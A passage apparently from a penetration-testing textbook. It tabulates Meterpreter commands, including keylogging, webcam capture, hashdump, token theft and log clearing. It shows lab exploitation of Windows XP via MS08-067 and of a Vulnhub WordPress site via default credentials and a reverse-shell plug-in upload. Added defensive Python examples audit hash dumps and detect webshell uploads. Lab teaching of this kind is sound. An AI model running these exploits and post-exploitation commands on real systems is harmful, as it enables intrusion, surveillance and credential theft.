Meterpreter Commands 


Meterpreter is an advanced payload for performing various post- 
exploitation activities. The following are some of the essential commands 
that can help you navigate through Meterpreter. 


Core Commands 


Table 3-1 describes a set of core Meterpreter commands that can help you 
with various session-related tasks on your target system. 
Table 3-1. Meterpreter Commands 


Command Description 

? Displays the help menu 

background Backgrounds the current session 

bgkill Kills a background Meterpreter script 

bglist Lists running background scripts 

bgrun Executes a Meterpreter script as a background thread 

channel Displays information or controls active channels 

close Closes a channel 

disable_unicode_encoding Disables encoding of Unicode strings 

enable_unicode_encoding Enables encoding of Unicode strings 

exit Terminates the Meterpreter session 

get_timeouts Gets the current session timeout values 

guid Gets the session GUID 

help Displays the help menu 

info Displays information about a post module 

irb Drops into irb scripting mode 

load Loads one or more Meterpreter extensions 

machine_id Gets the MSF ID of the machine attached to the session 

migrate Migrates the server to another process 

pivot Manages pivot listeners 

quit Terminates the Meterpreter session 

read Reads data from a channel 

resource Runs the commands stored in a file 

run Executes a Meterpreter script or post module 

sessions Quickly switches to another session 

set_timeouts Sets the current session timeout values 

sleep Forces Meterpreter to go quiet and then re-establishes the session 

transport Changes the current transport mechanism 

uuid Gets the UUID for the current session 

write Writes data to a channel 


Stdapi: System Commands 


Table 3-2 describes a set of essential system commands that provide an 
array of system tasks such as process list and kill, execute commands, 
reboot, and so on. 


Table 3-2. System Commands 


Command Description 

clearev Clears the event log 

drop_token Relinquishes any active impersonation token 

execute Executes a command 

getenv Gets one or more environment variable values 

getpid Gets the current process identifier 

getprivs Attempts to enable all privileges available to the current process 

getsid Gets the SID of the user who the server is running as 

getuid Gets the user who the server is running as 

kill Terminates a process 

localtime Displays the target system’s local date and time 

pgrep Filters processes by name 

pkill Terminates processes by name 

ps Lists running processes 

reboot Reboots the remote computer 

reg Modifies and interacts with the remote registry 

rev2self Calls RevertToSelf() on the remote machine 

shell Drops into a system command shell 

shutdown Shuts down the remote computer 

steal_token Attempts to steal an impersonation token from the target process 

suspend Suspends or resumes a list of processes 

sysinfo Gets information about the remote system, such as the OS 
Stdapi: User Interface Commands 


Table 3-3 lists the commands that help you get remote screenshots and the 
keystrokes from the target system. 


Table 3-3. User Interface Commands 


Command Description 


enumdesktops Lists all accessible desktops and window stations 
getdesktop Gets the current Meterpreter desktop 

idletime Returns the number of seconds the remote user has been idle 
keyscan_dump Dumps the keystroke buffer 

keyscan_start Starts capturing keystrokes 


keyscan_stop Stops capturing keystrokes 


screenshot Grabs a screenshot of the interactive desktop 
setdesktop Changes the Meterpreter’s current desktop 
uictl Controls some of the user interface components 


Stdapi: Webcam Commands 


Table 3-4 describes the commands that can be effective in getting 
live pictures and video streaming from the webcam attached to your 
compromised system. 
Table 3-4. Webcam Commands 


Command Description 

record _mic Records audio from the default microphone for x seconds 
webcam_chat Starts a video chat 

webcam_list Lists webcams 

webcam_snap Takes a snapshot from the specified webcam 
webcam_stream Plays a video stream from the specified webcam 


Stdapi: Audio Output Commands 


Table 3-5 describes a command that helps you play audio files on a 
compromised system. 


Table 3-5. Audio Output Command 


Command Description 


play Plays an audio file on a target system, with nothing written on disk 


Priv: Elevate Commands 


Table 3-6 describes a command that helps you escalate privileges to the 
highest possible level, possibly root or administrator. 


Table 3-6. Elevate Commands 


Command Description 


getsystem Attempts to elevate your privilege to that of the local system 
Priv: Password Database Commands 


Table 3-7 describes a command that helps you get the raw password 
hashes from the compromised system. 


Table 3-7. Password Database Commands 


Command Description 


hashdump Dumps the contents of the SAM database 


Priv: Timestomp Commands 


Table 3-8 describes a command that is part of Metasploit’s antiforensic 
capabilities. 


Table 3-8. Timestomp Commands 


Command Description 


timestomp Manipulates a file’s MACE attributes 


Using Meterpreter 


To get familiar with Meterpreter, let’s first get remote access to a target 
system using the SMB MS08-067 netapi vulnerability, as shown in 
Figure 3-42. The exploit was successful, and you get the Meterpreter shell. 
msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi): 

   Name     Current Setting  Required  Description 
   RHOST                     yes       The target address 
   RPORT    445              yes       The SMB service port (TCP) 
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 

Exploit target: 

   Id  Name 
   0   Automatic Targeting 

msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.25.130 
RHOST => 192.168.25.130 
msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] 192.168.25.130:445 - Automatically detecting the target... 
[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 1 opened (192.168.25.128:4444 -> 192.168.25.130:1412) at 2018-09-24 15:30:22 +0530 

meterpreter > 


Figure 3-42. Successful exploitation of the target system using the 
exploit ms08_067_netapi 


sysinfo 


Once you have compromised the target using an exploit, you need to check 
some basic details about the target such as the exact operating system 
version, computer name, domain, architecture, and so on. Meterpreter 
offers a command called sysinfo that can be used to gather basic 
information about the target, as shown in Figure 3-43. 


msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] 192.168.25.130:445 - Automatically detecting the target... 
[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 2 opened (192.168.25.128:4444 -> 192.168.25.130:1452) at 2018-09-24 16:00:42 +0530 

meterpreter > sysinfo 
Computer        : SAGAR-C51B4AADE 
OS              : Windows XP (Build 2600, Service Pack 3). 
Architecture    : x86 
System Language : en_US 
Domain          : MSHOME 
Logged On Users : 1 
Meterpreter     : x86/windows 
meterpreter > 


Figure 3-43. The output of the sysinfo command within Meterpreter 
ls 


The Meterpreter ls command can be used to list the files in the current 
directory on the compromised system, as shown in Figure 3-44. 


[*] Meterpreter session 3 opened (192.168.25.128:4444 -> 192.168.25.130:1453) at 2018-09-24 16:03:59 +0530 

meterpreter > ls 
Listing: C:\WINDOWS\system32 

Mode  Size  Type  Last modified  Name 
(entries of the system32 directory, among them $winnt$.inf, 3com_dmi, 6to4svc.dll, AUTOEXEC.NT, CONFIG.NT, CatRoot, CatRoot2, Confidential.txt.txt, Dcache.bin, DirectX, FNTCACHE.DAT, IME, MSCTF.dll, Macromed, Microsoft, MsDtc, PerfStringBackup.INI, ReinstallBackups, Restore, Setup, ShellExt) 


Figure 3-44. The output of the auxiliary ls command in the 
Meterpreter listing of files on the remote compromised system 
getuid 


Once you have gotten access to the target system, you must understand 
what user privileges you have on the system. Having the root or 
administrator-level privileges is the most desirable, and a lower privilege 
access implies lots of restrictions on your actions. Meterpreter offers a 
command called getuid, as shown in Figure 3-45, that checks for the 
current privilege level on the compromised system. 


msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] 192.168.25.130:445 - Automatically detecting the target... 
[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 4 opened (192.168.25.128:4444 -> 192.168.25.130:1456) at 2018-09-24 16:07:53 +0530 

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 
meterpreter > 


Figure 3-45. The output of the getuid command in Meterpreter 


getsystem 


Once you have gained access to the target system using an applicable 
exploit, the next logical step is to check for privileges. Using the getuid 
command, you have already gauged your current privilege level. You 
may not have gotten root or administrator-level access, so to maximize 
the attack penetration, it is important to elevate your user privileges. 
Meterpreter helps you escalate privileges. Once a Meterpreter session is 
opened, you can use the getsystem command, as shown in Figure 3-46, to 
escalate privileges to that of an administrator. 




msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] 192.168.25.130:445 - Automatically detecting the target... 
[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 7 opened (192.168.25.128:4444 -> 192.168.25.130:1483) at 2018-09-24 16:14:02 +0530 

meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 
meterpreter > 


Figure 3-46. The output of the getsystem command in Meterpreter 


screenshot 


After a system compromise, it is interesting to get a glimpse of the desktop 
GUI running on the target system. Meterpreter offers a utility known as 
screenshot, as shown in Figure 3-47. It simply takes a snapshot of the 
current desktop on the target system and saves it in the local root folder. 


msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] 192.168.25.130:445 - Automatically detecting the target... 
[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 5 opened (192.168.25.128:4444 -> 192.168.25.130:1459) at 2018-09-24 16:09:38 +0530 

meterpreter > screenshot 
Screenshot saved to: /root/EwATCQQp.jpeg 
meterpreter > 


Figure 3-47. The output of the screenshot command in Meterpreter 


Figure 3-48 shows the desktop screen captured from a compromised 
system. 
Figure 3-48. The screenshot of a desktop running on a remote 
compromised system 


hashdump 


After a successful system compromise, you certainly will want to get the 
credentials of different users on that system. Once a Meterpreter session 
is opened, you can use the hashdump command to dump all the LM and 
NTLM hashes from the compromised system, as shown in Figure 3-49. 
Once you have these hashes, you can feed them to various offline hash 
crackers and retrieve passwords in plain text. 


[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 6 opened (192.168.25.128:4444 -> 192.168.25.130:1482) at 2018-09-24 16:12:49 +0530 

meterpreter > hashdump 
Administrator:500:...:...::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
HelpAssistant:1000:...:...::: 
shareuser:1003:...:...::: 
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::: 
test:...:...:...::: 
meterpreter > 


Figure 3-49. The output of the hashdump command in Meterpreter 
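A hashdump is also evidence in an incident, and the lines in Figure 3-49 carry more than input for a cracker. The Python script below is an added example, not code from this book or from Metasploit: it parses the pwdump layout that hashdump prints (user:RID:LM hash:NT hash:::) and reports what an auditor or responder wants to know at a glance, namely accounts with a blank password, accounts that still store an LM hash, several accounts sharing one NT hash, and the built-in Administrator account (RID 500). The sample lines are constructed; the Guest line uses the genuine empty LM and NT hash values (the LM value stored when no LM hash exists, and the NT hash of the empty password), while every other hash value is a made-up hexadecimal placeholder.

```python
"""Audit the output of Meterpreter's hashdump for weak password hygiene.

Added example, not from the book or Metasploit. SAMPLE_HASHDUMP is constructed
in the pwdump layout hashdump prints (user:RID:LM:NT:::). The Guest line
carries the genuine empty LM/NT hash values; all other hash values are
made-up placeholders.
"""
from collections import defaultdict
from typing import NamedTuple

# LM field stored when no LM hash exists, and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


class Account(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


# Constructed sample; hash values other than the Guest line are placeholders.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
shareuser:1003:0123456789abcdef0123456789abcdef:00112233445566778899aabbccddeeff:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
this line is not a hash record
"""


def parse_hashdump(text):
    """Parse pwdump-style lines; malformed lines are skipped, never guessed at."""
    accounts = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue
        lm, nt = fields[2].lower(), fields[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue                      # LM and NT hashes are 16 bytes = 32 hex chars
        accounts.append(Account(fields[0], int(fields[1]), lm, nt))
    return accounts


def audit(accounts):
    """Return the findings a defender wants from a dump.

    blank_password : accounts whose NT hash is the empty-password hash
    lm_hash_present: accounts that still store an LM hash (quick to crack;
                     a sign the 'NoLMHash' policy is not in effect)
    shared_nt_hash : NT hashes used by more than one account (password reuse)
    builtin_admin  : the RID 500 account, which must never share a password
    """
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a.nt].append(a.user)
    return {
        "blank_password": [a.user for a in accounts if a.nt == EMPTY_NT],
        "lm_hash_present": [a.user for a in accounts if a.lm != EMPTY_LM],
        "shared_nt_hash": {nt: users for nt, users in by_nt.items()
                           if len(users) > 1 and nt != EMPTY_NT},
        "builtin_admin": [a.user for a in accounts if a.rid == 500],
    }


if __name__ == "__main__":
    for key, value in audit(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{key}: {value}")
```

The RID is checked rather than the account name because the built-in Administrator account keeps RID 500 even when it has been renamed.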




Searchsploit 


So far you have learned that Metasploit has a rich collection of auxiliaries, 
exploits, payloads, encoders, and so on. However, at times an exploit code 
for a certain vulnerability might not exist in Metasploit. In such a case, you 
may need to import the required exploit into Metasploit from an external 
source. Exploit-DB is a comprehensive source of exploits for various 
platforms, and Searchsploit is a utility that helps search for a particular 
exploit in Exploit-DB. Figure 3-50 shows the use of the Searchsploit tool to 
look for uTorrent-related exploits. 


Figure 3-50. The use of the Searchsploit tool to search for exploits 
related to uTorrent 


Summary 


This chapter introduced you to the various aspects of Metasploit, starting 
from the framework structure to using exploits and auxiliaries against 
services. You also learned how to leverage Metasploit capabilities to 
integrate NMAP and OpenVAS. Having learned about various Metasploit 
payloads, auxiliaries, and exploits, in the next chapter you'll learn to apply 
these skills to exploit a vulnerable machine. 


Do-It-Yourself (DIY) Exercises 


• Browse through the Metasploit directory and understand its structure. 

• Try various commands such as set, setg, unset, unsetg, spool, and more. 

• Initiate an NMAP scan from MSFconsole. 

• Perform a vulnerability assessment on the target system using OpenVAS from within MSFconsole. 

• Explore various auxiliary modules and use them to scan services such as HTTP, FTP, SSH, and so on. 

• Try different features of Meterpreter such as getsystem and hashdump. 
Use Case 


In the previous three chapters, you got acquainted with the essential tools 
NMAP, OpenVAS, and Metasploit. You learned about each of the tools 
in detail as well as how they can be integrated with each other for better 
efficiency. 

Now it’s time to put all that knowledge together and apply it in a 
practical scenario. In this chapter, you'll apply the various techniques 
you've learned so far to exploit a vulnerable system and get access to it. 


Creating a Virtual Lab 


It may not always be possible to try your newly learned skills on live 
production systems. Hence, you can try your skills in your own virtual lab 
in a restricted manner. 

Vulnhub (https://www.vulnhub.com) is a site that provides systems 
for download that are deliberately made vulnerable. You simply need to 
download a system image and boot it in VirtualBox or VMware. 

For the purposes of this case study, go to https://www.vulnhub.com/entry/basic-pentesting-1,216/ 
and download the system. Once you’ve downloaded it, boot it using either 
VirtualBox or VMware. The initial boot screen for the system looks like Figure 4-1. 
[Figure 4-1 screenshot: Ubuntu 16.04 LTS login screen listing the user marlinspike and a Guest Session] 

Figure 4-1. Initial boot screen of target system 


You do not have any credentials to log in to the system, so you will have 
to use your pen testing skills to get inside. 


Carrying Out Reconnaissance 


In Kali Linux, launch ZENMAP to perform a port scan and service 
enumeration on this target, as shown in Figure 4-2. 
[Figure 4-2 screenshot: Zenmap with the Intense scan profile, command nmap -T4 -A -v 192.168.25.132. The Nmap Output tab reports, for host vtcsec (192.168.25.132): 

PORT   STATE SERVICE VERSION 
21/tcp open  ftp     ProFTPD 1.3.3c 
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) 
MAC Address: 00:0C:29:4C:BB:59 (VMware) 
OS details: Linux 3.2 - 4.8 
Network Distance: 1 hop 
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds] 

Figure 4-2. Output of NMAP intense scan done on the target system 


In the ZENMAP output, you can see that the following ports are open: 

• Port 21 running ProFTPD 1.3.3c 

• Port 22 running OpenSSH 7.2p2 

• Port 80 running Apache httpd 2.4.18 
Based on this output, you have three possible ways to compromise the 
system: 

• Search and execute any exploit for ProFTPD 1.3.3c in Metasploit 

• Brute-force user credentials against SSH running on port 22 

• Explore whether any application is hosted on port 80 
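The same scan result is what a defender compares against an asset inventory. As an added example, not from the book, this Python snippet parses Nmap's XML output (what the Zenmap command above would write with -oX) and flags open ports that are not on an approved baseline; the XML is a constructed, abbreviated sample for the three services found on vtcsec, and the baseline is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed, abbreviated sample of what `nmap -T4 -A -v 192.168.25.132 -oX scan.xml`
# writes for the services found in the chapter (only the fields used below).
NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -T4 -A -v 192.168.25.132">
  <host>
    <address addr="192.168.25.132" addrtype="ipv4"/>
    <address addr="00:0C:29:4C:BB:59" addrtype="mac" vendor="VMware"/>
    <hostnames><hostname name="vtcsec" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="ProFTPD" version="1.3.3c"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.4"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.18"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>
"""

def open_services(xml_text):
    """Return {ipv4: [(port, service, product, version), ...]} for open ports."""
    result = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        svcs = []
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}  # no version probe result
            svcs.append((int(port.get("portid")), attrs.get("name", "unknown"),
                         attrs.get("product", ""), attrs.get("version", "")))
        result[addr] = sorted(svcs)
    return result

def unexpected_exposure(found, baseline):
    """Open services per host whose port is not in that host's approved set."""
    return {ip: [s for s in svcs if s[0] not in baseline.get(ip, set())]
            for ip, svcs in found.items()}

# Assumed baseline: only SSH and the web server were ever approved on this host.
BASELINE = {"192.168.25.132": {22, 80}}
```

unexpected_exposure(open_services(NMAP_XML), BASELINE) singles out the FTP service on port 21, the very entry the chapter goes on to exploit.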


Exploiting the System 


When you try to access the system on port 80 using a browser, you will get 
the default web server page shown in Figure 4-3. 


[Figure 4-3 screenshot: Firefox at http://192.168.25.132/ showing the Apache default page: "It works! This is the default web page for this server. The web server software is running but no content has been added, yet."] 


Figure 4-3. The default landing web page on a target system 
(port 80) 


You will now go back to NMAP again, and this time instead of a port 
scan, you'll use the NMAP script http-enum, as shown in Figure 4-4. 
[Figure 4-4 screenshot: Zenmap running nmap --script http-enum 192.168.25.132. The Nmap Output tab reports: 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-27 14:37 IST 
Nmap scan report for vtcsec (192.168.25.132) 
Host is up (0.00063s latency). 
Not shown: 997 closed ports 
PORT   STATE SERVICE 
21/tcp open  ftp 
22/tcp open  ssh 
80/tcp open  http 
| http-enum: 
|_  /secret/: Potentially interesting folder 
MAC Address: 00:0C:29:4C:BB:59 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds] 

Figure 4-4. Output of the http-enum NMAP script executed on a 
target system 


The output of the script tells you that there’s a folder on the web server 
named secret, which might have something interesting for you. 

Having received inputs about the secret folder on the server, try 
accessing it, as shown in Figure 4-5. 
[Figure 4-5 screenshot: Firefox showing "My secret blog - Just another WordPress site", with a single "Hello world!" post dated November 10, 2017 and the default Recent Posts, Recent Comments and Archives widgets; the page renders without its stylesheet] 

Figure 4-5. Browsing the secret directory hosted on the target web 
server 


You can see a screen that implies it is some kind of blog based on 
WordPress. However, the web page appears to be broken and incomplete. 

When you try to load the page, the browser looks for the vtcsec host. 
That means you need to configure your system to resolve this hostname. 
You can simply open the terminal and then open the file /etc/hosts in a 
text editor, as shown in Figure 4-6. 


[Figure 4-6 screenshot: /etc/hosts open in gedit] 

127.0.0.1       localhost 
127.0.1.1       kali 
192.168.25.132  vtcsec 

# The following lines are desirable for IPv6 capable hosts 
::1     localhost ip6-localhost ip6-loopback 
ff02::1 ip6-allnodes 
ff02::2 ip6-allrouters 

Figure 4-6. Editing the /etc/hosts file to add a new host entry 
In the terminal, run the following: gedit /etc/hosts. 

Next, add a new line: 192.168.25.132 vtcsec. 

Now that you have made the necessary changes in the hosts file, let’s 
try to access the web interface once again. The interface loads, as shown in 
Figure 4-7. 


[Figure 4-7 screenshot: Firefox showing the fully styled "MY SECRET BLOG" home page, with the window title "My secret blog - Just another WordPress site"] 

Figure 4-7. The home page of a WordPress blog hosted on the target 
system 


By examining the page shown in Figure 4-8, it is evident that the 
application is based on WordPress. 
[Figure 4-8 screenshot: the WordPress login form of "My secret blog" in Firefox] 

Figure 4-8. The WordPress login page on your target system 

Next, you require the credentials to get into the admin console of the 
application. You have three ways of getting them, as shown here: 

• Guess the credentials; many times default credentials work. 

• Use a password-cracking tool like Hydra to crack the credentials. 

• Use the Metasploit auxiliary module auxiliary/scanner/http/wordpress_login_enum 
to launch a brute-force attack against the application credentials. 

In this case, the application has the default credentials of admin/admin. 
Now that you have application credentials, you can use Metasploit 
to upload a malicious plug-in to WordPress, which will give you remote 
shell access. A WordPress plug-in is a ready-to-use piece of code that you 
can import into the WordPress installation to enable additional features. 
You can use the search command in MSFconsole to look for any exploits 
related to WordPress administration, as shown in Figure 4-9. 


[Figure 4-9 screenshot: msfconsole (metasploit v4.17.7-dev) session] 

msf > search wp admin 
[!] Module database cache not built yet, using slow search 

Matching Modules 
================ 

   Name                                       Disclosure Date  Rank       Description 
   ----                                       ---------------  ----       ----------- 
   exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  WordPress Admin Shell Upload 

msf > 

Figure 4-9. Output of the search query for the wp_admin exploit in 
Metasploit 


You now need to use the exploit exploit/unix/webapp/wp_admin_shell_upload, 
as shown in Figure 4-10. You need to configure the 
parameters USERNAME, PASSWORD, TARGETURI, and RHOST. 
[Figure 4-10 screenshot: msfconsole session] 

msf > use exploit/unix/webapp/wp_admin_shell_upload 
msf exploit(unix/webapp/wp_admin_shell_upload) > show options 

Module options (exploit/unix/webapp/wp_admin_shell_upload): 

   Name       Current Setting  Required  Description 
   ----       ---------------  --------  ----------- 
   PASSWORD   admin            yes       The WordPress password to authenticate with 
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...] 
   RHOST                       yes       The target address 
   RPORT      80               yes       The target port (TCP) 
   SSL        false            no        Negotiate SSL/TLS for outgoing connections 
   TARGETURI  /secret/         yes       The base path to the wordpress application 
   USERNAME   admin            yes       The WordPress username to authenticate with 
   VHOST                       no        HTTP server virtual host 

Payload options (php/meterpreter/reverse_tcp): 

   Name   Current Setting  Required  Description 
   ----   ---------------  --------  ----------- 
   LHOST  192.168.25.128   yes       The listen address (an interface may be specified) 
   LPORT  4444             yes       The listen port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   WordPress 

msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin 
USERNAME => admin 
msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin 
PASSWORD => admin 
msf exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /secret/ 
TARGETURI => /secret/ 
msf exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 192.168.25.132 
RHOST => 192.168.25.132 
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] Authenticating with WordPress using admin:admin... 
[+] Authenticated with WordPress 
[*] Preparing payload... 
[*] Uploading payload... 
[*] Executing the payload at /secret/wp-content/plugins/ihsrbawiPk/gzoTqvzncp.php... 
[*] Sending stage (37775 bytes) to 192.168.25.132 
[*] Meterpreter session 1 opened (192.168.25.128:4444 -> 192.168.25.132:41586) at 2018-09-27 15:52:59 +0530 
[+] Deleted gzoTqvzncp.php 
[+] Deleted ihsrbawiPk.php 
[+] Deleted ../ihsrbawiPk 

meterpreter > 

Figure 4-10. The use of the exploit wp_admin_shell_upload against 
the target system to gain Meterpreter access 


The exploit ran successfully by uploading the malicious plug-in into 
WordPress and finally giving you the required Meterpreter access. 
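From the defender's side, the run above leaves a distinctive trace in the web server's access log: an authenticated plug-in upload followed by a direct request for a PHP file under a plug-in directory that was never installed. As an added example, not from the book, this Python detection runs over a constructed sample log in Apache combined format; the set of legitimately installed plug-in directories is an assumption, and the upload endpoint path (wp-admin/update.php?action=upload-plugin) is WordPress's standard one.

```python
import re
from collections import namedtuple

# Apache "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
Hit = namedtuple("Hit", "ip ts method path status")

# Any PHP file requested directly from inside a plug-in directory.
PLUGIN_PHP = re.compile(r"/wp-content/plugins/(?P<plugin>[^/]+)/[^/?]+\.php")
UPLOAD_ENDPOINT = "wp-admin/update.php?action=upload-plugin"

def parse_access_log(lines):
    """Parse combined-format lines; lines that do not match are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits.append(Hit(m["ip"], m["ts"], m["method"], m["path"], int(m["status"])))
    return hits

def detect_plugin_shell(hits, installed_plugins):
    """Return (severity, client, plugin_dir, path) for PHP executed from an
    unknown plug-in directory; severity is raised when the same client
    uploaded a plug-in earlier in the log."""
    alerts, uploaders = [], set()
    for h in hits:
        if h.method == "POST" and UPLOAD_ENDPOINT in h.path:
            uploaders.add(h.ip)
        m = PLUGIN_PHP.search(h.path)
        if m and m["plugin"] not in installed_plugins and h.status == 200:
            severity = "high" if h.ip in uploaders else "medium"
            alerts.append((severity, h.ip, m["plugin"], h.path))
    return alerts

# Constructed sample log; the client address, timestamps and random plug-in
# path mirror the exploit run in the chapter, but the lines themselves are made up.
SAMPLE_LOG = [
    '192.168.25.128 - - [27/Sep/2018:15:52:57 +0530] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.25.128 - - [27/Sep/2018:15:52:58 +0530] "POST /secret/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '192.168.25.128 - - [27/Sep/2018:15:52:59 +0530] "GET /secret/wp-content/plugins/ihsrbawiPk/gzoTqvzncp.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [27/Sep/2018:16:01:10 +0530] "GET /secret/wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [27/Sep/2018:16:02:00 +0530] "GET /secret/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
INSTALLED_PLUGINS = {"akismet", "hello"}  # assumed list of legitimately installed plug-in dirs
```

Because the module deletes its plug-in files right after the session opens, the access log is often the only durable record of the upload, which is why the detection keys on the request path rather than on files left on disk.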

During your initial NMAP scan, you discovered that your target was 
also running an FTP server on port 21. The FTP server version is ProFTPd 
1.3.3. You can check whether Metasploit has any exploit for this FTP server 
version. Use the search command. 
Interestingly, Metasploit does have an exploit for the ProFTPd server. 
You can use exploit/unix/ftp/proftpd_133c_backdoor, as shown in 
Figure 4-11. All you need to configure is the RHOST variable. 


[Figure 4-11 screenshot: msfconsole session] 

msf > search proftpd 
[!] Module database cache not built yet, using slow search 

Matching Modules 
================ 

   Name                                         Disclosure Date  Rank       Description 
   ----                                         ---------------  ----       ----------- 
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) 
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) 
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) 
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow 
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution 
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution 

msf > use exploit/unix/ftp/proftpd_133c_backdoor 
